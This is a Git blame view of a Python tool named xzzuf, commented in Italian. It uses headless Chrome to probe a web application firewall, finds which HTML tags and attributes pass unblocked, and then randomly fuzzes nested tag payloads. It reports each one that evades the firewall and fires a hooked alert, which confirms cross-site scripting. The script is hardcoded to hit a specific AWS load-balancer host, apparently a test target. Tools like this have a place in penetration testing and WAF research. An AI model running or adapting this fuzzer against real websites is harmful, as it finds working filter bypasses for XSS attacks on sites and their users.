xzzuf/xzzuf.py

239 lines
8.0 KiB
Python
Raw Normal View History

2023-10-24 14:47:11 +00:00
from urllib.parse import unquote
import selenium
import time
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urlparse
from urllib.parse import urlencode
2023-10-24 15:49:07 +00:00
from tags import Attributes
2023-10-26 19:21:10 +00:00
from tags import Tags
import random
import argparse
2023-10-24 15:49:07 +00:00
2023-10-24 14:59:55 +00:00
# WAFBypass class
2023-10-24 15:49:07 +00:00
2023-10-25 09:25:41 +00:00
from language import HTMLTag, HTMLAttribute, HTMLTagAttributeType
t = HTMLTag("form")
i = HTMLTag("input", self_closing=True)
i.attributes.append(HTMLAttribute("type", HTMLTagAttributeType.TypeText))
t.children.append(i)
print(t)
2023-10-24 15:49:07 +00:00
2023-10-24 14:47:11 +00:00
class WAFBypass():
2023-10-26 19:21:10 +00:00
# Script JS per sovrascrivere la funzione alert nativa di JS.
2023-10-24 14:47:11 +00:00
code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"
def __init__(self, url) -> None:
2023-10-26 19:21:10 +00:00
"""
Inizializzazione webdriver e controllo connessione all'URL.
"""
2023-10-24 14:47:11 +00:00
self.options = webdriver.ChromeOptions()
self.options.add_argument('--no-sandbox')
self.options.add_argument('--headless')
self.driver = webdriver.Chrome(options=self.options)
self.url = urlparse(url)
2023-10-26 19:21:10 +00:00
# Liste di attributi e tag non filtrati
self.unfiltered_attributes = list()
self.unfiltered_tags = list()
2023-10-24 14:47:11 +00:00
if not self.check_connection():
raise Exception("Connection Error")
2023-10-26 19:21:10 +00:00
# Inietta il codice in ogni nuova pagina
2023-10-24 14:47:11 +00:00
self.driver.execute_cdp_cmd(
"Page.addScriptToEvaluateOnNewDocument", {"source": self.code})
2023-10-26 19:21:10 +00:00
def identify_unfiltered_attributes(self):
"""
Identifica gli attributi che non sono filtrati dal WAF.
"""
print("[*] Identifying unfiltered attributes:")
try:
for attr in Attributes:
encoded = urlencode({"param2": f"{attr}"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, _ = self.navigate(url)
if not is403:
print(f" [+] {attr.name}")
self.unfiltered_attributes.append(attr)
except KeyboardInterrupt:
self.driver.close()
exit(0)
def identify_unfiltered_tags(self):
"""
Identifica i tag che non sono filtrati dal WAF
"""
print("[*] Identifying unfiltered tags:")
try:
for tag_obj in Tags: #TODO aggiungere lista tag
tag_str = f"<{tag_obj.name}></{tag_obj.name}>" if not tag_obj.self_closing else f"<{tag_obj.name}/>"
encoded = urlencode({"param2": tag_str})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, _ = self.navigate(url)
if not is403:
print(f" [+] {tag_obj.name}")
self.unfiltered_tags.append(tag_obj)
except KeyboardInterrupt:
self.driver.close()
exit(0)
2023-10-24 14:47:11 +00:00
def check_connection(self):
2023-10-26 19:21:10 +00:00
"""
Verifica della possibilità di connessione all'URL.
"""
2023-10-24 14:47:11 +00:00
try:
self.driver.get(self.url.geturl())
return True
except:
return False
def wait_for_pageload(self):
2023-10-26 19:21:10 +00:00
"""
Delay per attendere che la pagina web sia completamente caricata.
"""
2023-10-24 14:47:11 +00:00
try:
WebDriverWait(self.driver, 4).until(
lambda driver: driver.execute_script("return document.readyState") == "complete")
except TimeoutError:
raise Exception("Page Load Error")
def get_page_title(self):
2023-10-26 19:21:10 +00:00
"""
Ritorna il titolo della pagina corrente
"""
2023-10-24 14:47:11 +00:00
return self.driver.title
@property
def is_403(self):
2023-10-26 19:21:10 +00:00
"""
Verifica se la pagina è 403 analizzando il titolo.
"""
2023-10-24 14:47:11 +00:00
return self.driver.title == "403 Forbidden"
@property
def triggered_xss(self):
2023-10-26 19:21:10 +00:00
"""
Verifica se l'XSS è stato eseguito.
"""
2023-10-24 14:47:11 +00:00
return self.driver.execute_script("return window.alert_trigger")
def navigate(self, url):
2023-10-26 19:21:10 +00:00
"""
Naviga verso un URL specifico e controlla se si verifica un errore 403 o un'esecuzione di XSS.
"""
2023-10-24 14:47:11 +00:00
self.driver.get(url)
self.wait_for_pageload()
2023-10-24 15:49:07 +00:00
is403 = False
2023-10-24 14:47:11 +00:00
if self.is_403:
2023-10-24 15:49:07 +00:00
is403 = True
2023-10-24 14:47:11 +00:00
else:
2023-10-24 15:49:07 +00:00
is403 = False
2023-10-24 14:47:11 +00:00
2023-10-24 15:49:07 +00:00
triggerxss = self.triggered_xss
2023-10-24 14:47:11 +00:00
2023-10-24 15:49:07 +00:00
return (is403, triggerxss)
2023-10-24 14:47:11 +00:00
def run_fuzz(self):
2023-10-26 19:21:10 +00:00
"""
Fuzzing solo su attributi non filtrati.
"""
print("[*] Start fuzzing:")
2023-10-24 14:47:11 +00:00
try:
2023-10-26 19:21:10 +00:00
for attr in self.unfiltered_attributes:
2023-10-24 15:49:07 +00:00
# print(f"[*] Testing {attr.name} attribute {attr}")
encoded = urlencode({"param2": f"{attr}"})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
# print(url)
2023-10-26 19:21:10 +00:00
_, trigger = self.navigate(url)
2023-10-24 14:47:11 +00:00
except KeyboardInterrupt:
self.driver.close()
exit(0)
2023-10-26 19:21:10 +00:00
def run_fuzz2(self, num_iterations=100000):
"""
Esegue un fuzzing personalizzato utilizzando solo tag e attributi che non sono stati filtrati.
"""
print("\n[*] Start fuzzing:")
try:
for _ in range(num_iterations):
tag_obj = random.choice(self.unfiltered_tags)
attr = random.choice(self.unfiltered_attributes)
# Genera numero random di figli (child) e attributi per ciascun figlio
num_child = random.randint(5, 10)
children = []
for _ in range(num_child):
child_tag = random.choice(self.unfiltered_tags)
child_attr = random.choice(self.unfiltered_attributes)
if child_tag.self_closing:
children.append(f"<{child_tag.name} {child_attr}/>")
else:
children.append(f"<{child_tag.name} {child_attr}></{child_tag.name}>")
# Crea la stringa del tag HTML
if tag_obj.self_closing:
tag_str = f"<{tag_obj.name} {attr}/>"
else:
child_str = ''.join(children)
tag_str = f"<{tag_obj.name} {attr}>{child_str}</{tag_obj.name}>"
# Codifica e invia la richiesta
encoded = urlencode({"param2": tag_str})
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
is403, triggered = self.navigate(url)
if not is403 and triggered:
print(f"[*] Bypass found: {tag_str}")
# if args.link:
print(f" {url}")
except KeyboardInterrupt:
self.driver.close()
exit(0)
2023-10-24 14:47:11 +00:00
2023-10-26 19:21:10 +00:00
# Creazione dell'istanza della classe.
2023-10-24 14:47:11 +00:00
w = WAFBypass("http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com")
2023-10-26 19:21:10 +00:00
# Avvio identificazione di attributi e tag validi
w.identify_unfiltered_attributes()
w.identify_unfiltered_tags()
w.run_fuzz2()
'''
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="WAF Bypass Fuzzer")
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-p', '--param', required=True, help='Target Parameter')
parser.add_argument('-i', '--iterations', type=int, help='Number of iterations (default: infinite)')
parser.add_argument('-l', '--link', action='store_true', help='Provide full request link')
args = parser.parse_args()
w = WAFBypass(args.url)
if args.iterations:
w.run_fuzz2(num_iterations=args.iterations)
else:
# loop infinito se '-i' non è specificato
while True:
w.identify_unfiltered_attributes()
w.identify_unfiltered_tags()
w.run_fuzz2()
'''